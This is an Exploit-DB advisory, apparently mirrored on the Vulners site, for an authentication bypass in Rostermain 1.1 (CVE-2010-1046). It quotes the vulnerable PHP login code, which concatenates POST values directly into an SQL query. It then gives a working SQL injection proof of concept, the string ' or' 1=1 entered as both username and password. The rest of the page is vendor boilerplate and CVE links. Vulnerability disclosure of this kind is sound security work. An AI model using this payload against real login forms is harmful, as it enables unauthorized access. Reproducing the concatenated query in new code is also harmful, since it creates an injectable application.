Lucene search
+L

Rostermain 1.1 - Authentication Bypass

🗓️ 07 Feb 2010 00:00:00Reported by cr4wl3rType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

Authentication Bypass vulnerability in Rostermain 1.

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2010-1046
7 Feb 201000:00
circl
CVE
CVE-2010-1046
22 Mar 201018:17
cve
Cvelist
CVE-2010-1046
22 Mar 201018:17
cvelist
EUVD
EUVD-2010-1078
7 Oct 202500:30
euvd
NVD
CVE-2010-1046
23 Mar 201001:00
nvd
Prion
Sql injection
23 Mar 201001:00
prion
[+] Rostermain <= 1.1 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org>
[+] Download : http://scripts.ringsworld.com/games-and-entertainment/rostermain/


[+] Vuln Code :

[index.php]

if ($_POST['userid'] && $_POST['password'])
{
  // if the user has just tried to log in
  $logquery = "select * from users "
           ."where username='$userid' "
           ." and passwd='$password' ";

[+] PoC :

username :  ' or' 1=1
password :  ' or' 1=1

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Feb 2010 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.00973
37